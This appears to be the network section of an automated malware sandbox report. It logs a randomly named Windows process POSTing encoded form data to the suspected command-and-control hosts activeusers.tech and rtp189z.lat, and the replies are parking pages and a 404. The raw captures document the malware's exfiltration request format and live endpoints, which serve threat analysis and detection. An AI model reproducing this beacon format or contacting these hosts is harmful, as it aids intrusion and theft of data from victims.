Jan 16, 2025 09:24:51.842596054 CET	753	OUT	POST /s76m/ HTTP/1.1 Host: www.activeusers.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Content-Length: 202 Cache-Control: no-cache Connection: close Origin: http://www.activeusers.tech Referer: http://www.activeusers.tech/s76m/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1 Data Raw: 42 58 63 38 56 3d 30 38 48 32 4d 70 41 66 70 41 71 63 59 76 6c 78 6a 61 32 62 77 76 4e 2f 6a 4e 41 44 2f 43 2b 55 52 64 4e 37 4a 4d 42 78 36 50 59 70 4a 72 5a 76 67 2b 44 5a 72 47 79 52 33 6b 4b 6e 52 48 7a 6a 45 4a 58 34 79 2f 36 53 63 4b 6c 35 34 54 62 41 33 51 53 64 30 59 6d 4e 4e 58 4c 62 6c 79 6c 50 59 4f 47 37 42 6d 75 69 47 49 6e 6d 5a 56 6c 50 56 38 65 35 43 53 46 72 61 61 6b 6b 33 6f 66 67 58 66 52 54 51 6a 32 69 6a 42 72 72 4e 2b 6a 30 70 66 77 66 56 62 45 2b 34 50 42 2b 51 4b 33 35 70 65 49 76 37 36 4f 52 5a 39 62 49 5a 30 54 4c 4d 4a 6b 36 72 67 66 67 30 48 34 44 63 59 36 68 36 51 3d 3d Data Ascii: BXc8V=08H2MpAfpAqcYvlxja2bwvN/jNAD/C+URdN7JMBx6PYpJrZvg+DZrGyR3kKnRHzjEJX4y/6ScKl54TbA3QSd0YmNNXLblylPYOG7BmuiGInmZVlPV8e5CSFraakk3ofgXfRTQj2ijBrrN+j0pfwfVbE+4PB+QK35peIv76ORZ9bIZ0TLMJk6rgfg0H4DcY6h6Q==
Jan 16, 2025 09:24:52.281989098 CET	1236	IN	HTTP/1.1 200 OK date: Thu, 16 Jan 2025 08:24:51 GMT content-type: text/html; charset=utf-8 content-length: 1130 x-request-id: 5479f327-815f-45cb-bfe0-41f7eddb84fb cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_k0Hn/Q/rhGinowfYxiQLpRVw5kDQLZk5t1bxzBjB3UfQ7tELtcyww+9XXBdbQESRrZ+sTgXCP0CdadZ4BoshAQ== set-cookie: parking_session=5479f327-815f-45cb-bfe0-41f7eddb84fb; expires=Thu, 16 Jan 2025 08:39:52 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 30 48 6e 2f 51 2f 72 68 47 69 6e 6f 77 66 59 78 69 51 4c 70 52 56 77 35 6b 44 51 4c 5a 6b 35 74 31 62 78 7a 42 6a 42 33 55 66 51 37 74 45 4c 74 63 79 77 77 2b 39 58 58 42 64 62 51 45 53 52 72 5a 2b 73 54 67 58 43 50 30 43 64 61 64 5a 34 42 6f 73 68 41 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_k0Hn/Q/rhGinowfYxiQLpRVw5kDQLZk5t1bxzBjB3UfQ7tELtcyww+9XXBdbQESRrZ+sTgXCP0CdadZ4BoshAQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 16, 2025 09:24:52.282027960 CET	583	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTQ3OWYzMjctODE1Zi00NWNiLWJmZTAtNDFmN2VkZGI4NGZiIiwicGFnZV90aW1lIjoxNzM3MDE1OD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	50021	199.59.243.228	80	5600	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 09:24:54.383601904 CET	773	OUT	POST /s76m/ HTTP/1.1 Host: www.activeusers.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Content-Length: 222 Cache-Control: no-cache Connection: close Origin: http://www.activeusers.tech Referer: http://www.activeusers.tech/s76m/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1 Data Raw: 42 58 63 38 56 3d 30 38 48 32 4d 70 41 66 70 41 71 63 62 50 56 78 6c 39 69 62 78 50 4e 38 76 74 41 44 78 69 2b 59 52 64 4a 37 4a 4a 34 30 36 38 38 70 4a 50 4a 76 68 37 6a 5a 6f 47 79 52 2f 45 4c 76 50 33 7a 34 45 4f 66 77 79 37 36 53 63 4b 68 35 34 57 2f 41 33 6a 4b 61 30 49 6d 50 54 33 4c 5a 68 79 6c 50 59 4f 47 37 42 6d 72 35 47 49 2f 6d 5a 47 39 50 48 4a 69 6d 65 69 46 6f 58 4b 6b 6b 7a 6f 65 70 58 66 52 39 51 69 72 50 6a 48 6e 72 4e 2f 54 30 70 4d 6f 63 63 62 45 30 32 76 41 63 56 4c 4b 43 70 73 70 44 79 4c 57 79 65 4f 76 30 52 53 65 52 64 34 46 74 35 67 37 54 70 41 78 33 52 62 48 6f 68 57 39 50 4c 73 7a 55 53 45 52 33 4a 32 4d 6b 4a 74 39 68 31 73 41 3d Data Ascii: BXc8V=08H2MpAfpAqcbPVxl9ibxPN8vtADxi+YRdJ7JJ40688pJPJvh7jZoGyR/ELvP3z4EOfwy76ScKh54W/A3jKa0ImPT3LZhylPYOG7Bmr5GI/mZG9PHJimeiFoXKkkzoepXfR9QirPjHnrN/T0pMoccbE02vAcVLKCpspDyLWyeOv0RSeRd4Ft5g7TpAx3RbHohW9PLszUSER3J2MkJt9h1sA=
Jan 16, 2025 09:24:54.824982882 CET	1236	IN	HTTP/1.1 200 OK date: Thu, 16 Jan 2025 08:24:54 GMT content-type: text/html; charset=utf-8 content-length: 1130 x-request-id: 37a021be-8673-4835-9740-e6ed5794ef45 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_k0Hn/Q/rhGinowfYxiQLpRVw5kDQLZk5t1bxzBjB3UfQ7tELtcyww+9XXBdbQESRrZ+sTgXCP0CdadZ4BoshAQ== set-cookie: parking_session=37a021be-8673-4835-9740-e6ed5794ef45; expires=Thu, 16 Jan 2025 08:39:54 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 30 48 6e 2f 51 2f 72 68 47 69 6e 6f 77 66 59 78 69 51 4c 70 52 56 77 35 6b 44 51 4c 5a 6b 35 74 31 62 78 7a 42 6a 42 33 55 66 51 37 74 45 4c 74 63 79 77 77 2b 39 58 58 42 64 62 51 45 53 52 72 5a 2b 73 54 67 58 43 50 30 43 64 61 64 5a 34 42 6f 73 68 41 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_k0Hn/Q/rhGinowfYxiQLpRVw5kDQLZk5t1bxzBjB3UfQ7tELtcyww+9XXBdbQESRrZ+sTgXCP0CdadZ4BoshAQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 16, 2025 09:24:54.825040102 CET	583	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzdhMDIxYmUtODY3My00ODM1LTk3NDAtZTZlZDU3OTRlZjQ1IiwicGFnZV90aW1lIjoxNzM3MDE1OD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	50022	199.59.243.228	80	5600	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 09:24:56.944113016 CET	10855	OUT	POST /s76m/ HTTP/1.1 Host: www.activeusers.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Content-Length: 10302 Cache-Control: no-cache Connection: close Origin: http://www.activeusers.tech Referer: http://www.activeusers.tech/s76m/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1 Data Raw: 42 58 63 38 56 3d 30 38 48 32 4d 70 41 66 70 41 71 63 62 50 56 78 6c 39 69 62 78 50 4e 38 76 74 41 44 78 69 2b 59 52 64 4a 37 4a 4a 34 30 36 38 30 70 4b 39 42 76 67 61 6a 5a 70 47 79 52 78 6b 4c 73 50 33 7a 35 45 49 33 4b 79 37 2f 6e 63 49 70 35 35 31 48 41 37 43 4b 61 2f 49 6d 50 62 58 4c 59 6c 79 6b 56 59 4f 57 2f 42 6d 37 35 47 49 2f 6d 5a 48 4e 50 45 63 65 6d 63 69 46 72 61 61 6b 57 33 6f 66 41 58 66 4a 4c 51 6a 66 35 69 33 48 72 4e 66 44 30 72 2f 4d 63 64 37 45 79 6d 2f 41 36 56 4c 47 64 70 73 46 35 79 4c 79 49 65 4a 48 30 54 55 4c 6d 42 49 56 67 6a 52 48 2b 73 42 51 54 52 70 58 44 6b 6b 56 37 44 4a 2f 79 43 58 70 72 43 32 68 44 61 34 56 4a 67 37 65 6f 36 44 74 4d 34 51 51 55 65 48 46 45 71 70 44 49 51 57 62 76 67 6f 5a 6d 70 30 76 41 50 73 34 68 58 65 4c 4e 39 4b 44 30 44 55 68 57 79 6a 6a 65 4c 35 52 52 53 78 59 56 6c 44 58 6c 69 38 62 31 57 45 57 66 77 53 71 52 33 42 4f 62 47 34 38 62 48 61 56 6d 70 5a 69 36 67 79 61 74 53 71 7a 6c 73 48 37 48 46 62 30 39 55 62 58 61 34 67 45 69 44 6c 76 73 [TRUNCATED] Data Ascii: BXc8V=08H2MpAfpAqcbPVxl9ibxPN8vtADxi+YRdJ7JJ40680pK9BvgajZpGyRxkLsP3z5EI3Ky7/ncIp551HA7CKa/ImPbXLYlykVYOW/Bm75GI/mZHNPEcemciFraakW3ofAXfJLQjf5i3HrNfD0r/Mcd7Eym/A6VLGdpsF5yLyIeJH0TULmBIVgjRH+sBQTRpXDkkV7DJ/yCXprC2hDa4VJg7eo6DtM4QQUeHFEqpDIQWbvgoZmp0vAPs4hXeLN9KD0DUhWyjjeL5RRSxYVlDXli8b1WEWfwSqR3BObG48bHaVmpZi6gyatSqzlsH7HFb09UbXa4gEiDlvs2XV6sF4aP98Sq1+5/b0mcoNbkGl8dtVJq/BfjdxL45bfwtcRT5cHLKvMYOSDfTVwHgHovuLqOCIF6I4h8M4mbFsfYGYp+6ACEPduGedpOfRh8J0Krxx8vWZcvDR+LjakYEcUA+VmkWxqGrEyvVgXX4TfH28p7a2ot/EQ1vIpDqN0oA4usvcuZHZ+MWuulFh7QBEAe8c+CLR+On0Gf/MPai5MRRGhRXOEANpzWctD1RO9zbgVCvTD3tuFC3cG/b3J4z6xLKo7g5dc1masjxqPciArvbVcJEUuNer9BuL7vzoLFGH9bNTrlJ3e/gq3aUbRtQZSvPYGW7drK7HPMVX/5BEOYTcpEgI30zquF9LKYldAS/bsDKp2B8PwCVyqfGSQrmbHACEtSiXaiFYOk03LfPo5K1kXHVJ9Y6BNEaKrjG239WKoXMM9ADOmm16+3Dxm7MQXaPK9ithsowx0LNMDl2QrSIuW72YMKe9Qxgf0LkFsjRPSwJYFIYHYV/2n6gZIv1WWU/tV+VFWtRsaKT/Ldae+ZQdLrNg4SGECZmp5Sc5e+JcfixjJIAkK9T9C+RdK00Vbw+Kwu03WsBVTKwuC2uCLTIooaXSzXAms9P/QKTVXNVxRAhMAdFAnZyyQB6mvN/grKgor8+70oVcR7zZq8oVahOALcurHfZ [TRUNCATED]
Jan 16, 2025 09:24:57.401324034 CET	1236	IN	HTTP/1.1 200 OK date: Thu, 16 Jan 2025 08:24:56 GMT content-type: text/html; charset=utf-8 content-length: 1130 x-request-id: 1fe93683-fa56-4895-b2b4-5cce9e6def8c cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_k0Hn/Q/rhGinowfYxiQLpRVw5kDQLZk5t1bxzBjB3UfQ7tELtcyww+9XXBdbQESRrZ+sTgXCP0CdadZ4BoshAQ== set-cookie: parking_session=1fe93683-fa56-4895-b2b4-5cce9e6def8c; expires=Thu, 16 Jan 2025 08:39:57 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 30 48 6e 2f 51 2f 72 68 47 69 6e 6f 77 66 59 78 69 51 4c 70 52 56 77 35 6b 44 51 4c 5a 6b 35 74 31 62 78 7a 42 6a 42 33 55 66 51 37 74 45 4c 74 63 79 77 77 2b 39 58 58 42 64 62 51 45 53 52 72 5a 2b 73 54 67 58 43 50 30 43 64 61 64 5a 34 42 6f 73 68 41 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_k0Hn/Q/rhGinowfYxiQLpRVw5kDQLZk5t1bxzBjB3UfQ7tELtcyww+9XXBdbQESRrZ+sTgXCP0CdadZ4BoshAQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 16, 2025 09:24:57.401376963 CET	583	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWZlOTM2ODMtZmE1Ni00ODk1LWIyYjQtNWNjZTllNmRlZjhjIiwicGFnZV90aW1lIjoxNzM3MDE1OD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	50023	199.59.243.228	80	5600	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 09:24:59.495326042 CET	485	OUT	GET /s76m/?BXc8V=5+vWPd9X0wSWPJRdjPK4htAFucAo2VruY7NWHsZJjc93W8tV5J/CvgfDxHaReh/JOtz7+f35BLAy5HXA0CqVvOWOdVDklARjVuGkQkqqALzufSU8AevfCiY=&f898=D4YHodiH3rXTfZ HTTP/1.1 Host: www.activeusers.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1
Jan 16, 2025 09:24:59.959383011 CET	1236	IN	HTTP/1.1 200 OK date: Thu, 16 Jan 2025 08:24:59 GMT content-type: text/html; charset=utf-8 content-length: 1482 x-request-id: 2a652746-0198-4c8a-a173-168b504ebbea cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_GpJgIdzfIYfKZEs9IAGXTchytjFBmQ9aQDkXfs/ckGzfwACIlBFqaczKVcGRL8aEt74s7y0YuHRsKL4hcPwWcA== set-cookie: parking_session=2a652746-0198-4c8a-a173-168b504ebbea; expires=Thu, 16 Jan 2025 08:39:59 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 47 70 4a 67 49 64 7a 66 49 59 66 4b 5a 45 73 39 49 41 47 58 54 63 68 79 74 6a 46 42 6d 51 39 61 51 44 6b 58 66 73 2f 63 6b 47 7a 66 77 41 43 49 6c 42 46 71 61 63 7a 4b 56 63 47 52 4c 38 61 45 74 37 34 73 37 79 30 59 75 48 52 73 4b 4c 34 68 63 50 77 57 63 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_GpJgIdzfIYfKZEs9IAGXTchytjFBmQ9aQDkXfs/ckGzfwACIlBFqaczKVcGRL8aEt74s7y0YuHRsKL4hcPwWcA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 16, 2025 09:24:59.959439993 CET	935	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmE2NTI3NDYtMDE5OC00YzhhLWExNzMtMTY4YjUwNGViYmVhIiwicGFnZV90aW1lIjoxNzM3MDE1OD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	50024	68.65.122.71	80	5600	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 09:25:05.029855013 CET	738	OUT	POST /tt36/ HTTP/1.1 Host: www.rtp189z.lat Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Content-Length: 202 Cache-Control: no-cache Connection: close Origin: http://www.rtp189z.lat Referer: http://www.rtp189z.lat/tt36/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1 Data Raw: 42 58 63 38 56 3d 32 56 35 74 37 74 6b 77 74 77 68 65 39 6d 52 51 42 56 39 6e 49 64 4e 51 4b 57 31 65 7a 75 53 4f 49 6c 73 6b 52 65 69 38 65 70 72 70 66 6f 4f 54 70 6a 59 39 35 2b 68 39 63 53 79 68 38 6a 4f 69 42 6b 54 38 4d 77 66 32 35 31 43 54 71 35 4d 64 45 2f 4b 64 39 58 56 57 77 72 36 58 6f 6a 66 30 52 65 35 79 7a 4f 62 44 58 48 46 57 6b 30 6b 6c 46 6c 31 49 33 6f 77 2f 47 35 30 4e 66 66 4a 34 6d 6f 66 72 55 77 62 57 4a 50 67 6f 66 6d 34 67 4b 47 65 44 59 5a 51 6a 52 69 54 66 47 4c 35 68 4d 67 61 4e 79 6e 68 52 52 50 58 61 4e 4b 48 6e 52 41 69 61 2f 55 75 68 71 4d 46 70 75 49 74 6e 6a 51 3d 3d Data Ascii: BXc8V=2V5t7tkwtwhe9mRQBV9nIdNQKW1ezuSOIlskRei8eprpfoOTpjY95+h9cSyh8jOiBkT8Mwf251CTq5MdE/Kd9XVWwr6Xojf0Re5yzObDXHFWk0klFl1I3ow/G50NffJ4mofrUwbWJPgofm4gKGeDYZQjRiTfGL5hMgaNynhRRPXaNKHnRAia/UuhqMFpuItnjQ==
Jan 16, 2025 09:25:05.903883934 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 16 Jan 2025 08:25:05 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 